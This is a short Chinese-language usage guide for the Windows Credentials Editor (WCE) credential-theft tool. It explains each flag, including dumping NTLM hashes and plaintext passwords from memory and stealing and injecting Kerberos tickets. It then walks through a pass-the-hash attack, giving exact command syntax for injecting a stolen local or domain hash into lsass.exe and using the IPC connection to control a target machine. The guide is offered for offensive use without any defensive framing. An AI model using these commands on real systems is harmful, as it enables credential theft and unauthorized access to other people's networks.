wce的使用說明如下
參數解釋:
-l 列出登錄的會話和NTLM憑據(默認值)
-s 修改當前登錄會話的NTLM憑據 參數:<用戶名>:<域名>:<LM哈希>:<NT哈希>
-r 不定期的列出登錄的會話和NTLM憑據,如果找到新的會話,那么每5秒重新列出一次
-c 用一個特殊的NTML憑據運行一個新的會話 參數:<cmd>
-e 不定期的列出登錄的會話和NTLM憑據,當產生一個登錄事件的時候重新列出一次
-o 保存所有的輸出到一個文件 參數:<文件名>
-i 指定一個LUID代替使用當前登錄會話 參數:<luid>
-d 從登錄會話中刪除NTLM憑據 參數:<luid>
-a 使用地址 參數: <地址>
-f 強制使用安全模式
-g 生成LM和NT的哈希 參數<密碼>
-K 緩存kerberos票據到一個文件(unix和windows wce格式)
-k 從一個文件中讀取kerberos票據並插入到windows緩存中
-w 通過摘要式認證緩存一個明文的密碼
-v 詳細輸出
常用命令記錄
wce.exe -w 讀取系統管理員明文密碼(sam):

wce.exe -l 從內存中讀取已經登錄的信息,而不是讀取sam數據庫中的信息。
-c用來執行cmd,-v顯示詳細,-w查看已經登錄的明文密碼。
下面是-s參數進行hash注入
在上面的使用說明中可以看到,-s參數可以用來hash注入。
hash注入的原理是將我們預備好的目標機器的本地或者是域用戶hash注入到本地的認證進程lsass.exe中去,使得本地在使用ipc登錄目標機器的時候就如同自己登錄自己的機器一樣獲得權限。至於目標機器的本地或者是域用戶hash如何取得那就要發揮你自己的想象力了。hash注入本身是為了對付那些破解不了的NTHASH。
首先我們看本地的hash

具體的命令格式如下:
wce.exe -s 用戶名:對方機器名或者ip:LM-HASH:NT-HASH
當提示注入成功的時候,這時候鍵入net use命令並沒有看到有連接,其實已經可以連接了,直接使用ipc命令操作對方的機器就可以了,如上圖。
其次域里的域用戶hash也可以使用wce進行注入,只需要把命令格式變一變就行
wce.exe -s 用戶名:域名:LM-HASH:NT-HASH
